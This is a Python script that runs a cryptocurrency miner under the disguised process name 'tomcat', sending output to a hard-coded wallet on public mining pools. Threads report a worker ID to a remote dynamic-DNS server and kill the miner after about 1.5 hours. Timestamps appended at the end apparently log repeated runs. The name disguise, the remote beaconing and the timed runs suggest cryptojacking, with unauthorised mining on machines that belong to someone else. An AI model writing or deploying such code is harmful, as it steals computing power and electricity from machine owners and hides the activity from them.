import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:25:04.447802
#2018-02-17 17:12:07.517114
#2018-02-17 19:00:04.574851
#2018-02-17 20:49:03.975204
#2018-02-17 22:36:03.505382
#2018-02-18 00:20:04.300127
#2018-02-18 02:11:04.320941
#2018-02-18 03:58:04.992440
#2018-02-18 05:48:04.438065
#2018-02-18 07:40:07.897982
#2018-02-18 09:27:04.261465
#2018-02-18 11:13:03.909857
#2018-02-18 13:00:08.073907
#2018-02-18 14:50:06.395724
#2018-02-18 16:39:06.150427
#2018-02-18 18:27:06.911618
#2018-02-18 20:14:05.750661
#2018-02-18 22:00:01.581285
#2018-02-18 23:48:07.591825
#2018-02-19 01:34:06.966143
#2018-02-19 03:24:02.209956
#2018-02-19 05:09:05.324643
#2018-02-19 06:56:05.844642
#2018-02-19 08:45:06.433711
#2018-02-19 10:33:01.595116
#2018-02-19 12:20:08.063551
#2018-02-19 14:07:08.083644
#2018-02-19 15:56:04.748456
#2018-02-19 17:44:01.395159
#2018-02-19 19:32:08.419063
#2018-02-19 21:22:01.757093
#2018-02-19 23:08:05.899675
#2018-02-20 00:54:04.152040
#2018-02-20 02:44:09.346719
#2018-02-20 04:34:06.649474
#2018-02-20 06:18:01.488064
#2018-02-20 08:03:06.110067
#2018-02-20 09:48:06.647434
#2018-02-20 11:33:07.388297
#2018-02-20 13:20:09.820132
#2018-02-20 15:05:08.408155
#2018-02-20 16:51:04.138017
#2018-02-20 18:39:05.416814
#2018-02-20 20:31:07.477581
#2018-02-20 22:17:06.943757
#2018-02-21 00:00:01.530740
#2018-02-21 01:45:04.449980
#2018-02-21 03:35:07.302947
#2018-02-21 05:23:07.495824
#2018-02-21 07:10:08.824883
#2018-02-21 08:55:07.327621
#2018-02-21 10:42:09.611284
#2018-02-21 12:30:05.409664
#2018-02-21 14:18:09.153390
#2018-02-21 16:05:08.748403
#2018-02-21 17:56:10.187303
#2018-02-21 19:42:01.743074
#2018-02-21 21:32:07.603751
#2018-02-21 23:19:01.328524
#2018-02-22 01:08:07.781424
#2018-02-22 02:55:03.559672
#2018-02-22 04:42:06.149391
#2018-02-22 06:27:05.447288
#2018-02-22 08:15:05.231808
#2018-02-22 10:04:01.912307
#2018-02-22 11:48:01.794907
#2018-02-22 13:34:04.860849
#2018-02-22 15:24:10.013844
#2018-02-22 17:12:08.032195
#2018-02-22 18:58:01.829282
#2018-02-22 20:51:05.135150
#2018-02-22 22:38:05.079585
#2018-02-23 00:27:04.706266
#2018-02-23 02:15:10.110776
#2018-02-23 04:02:05.440000
#2018-02-23 05:47:07.218236
#2018-02-23 07:37:03.349788
#2018-02-23 09:39:01.500958
#2018-02-23 11:45:09.764419
#2018-02-23 13:35:09.843900
#2018-02-23 15:22:02.064862
#2018-02-23 17:11:09.479607
#2018-02-23 18:55:05.505713
#2018-02-23 20:43:07.699299
#2018-02-23 22:29:05.836134
#2018-02-24 00:16:01.212717
#2018-02-24 02:07:04.493017
#2018-02-24 03:57:06.601649
#2018-02-24 05:42:08.983034
#2018-02-24 07:33:07.512884
#2018-02-24 09:20:06.806348
#2018-02-24 11:13:03.746730
#2018-02-24 13:02:07.354456
#2018-02-24 14:49:05.271278
#2018-02-24 16:42:01.726143
#2018-02-24 18:30:03.282536
#2018-02-24 20:17:06.962532
#2018-02-24 23:46:06.291802
#2018-02-25 03:38:07.090787
#2018-02-25 07:17:01.661424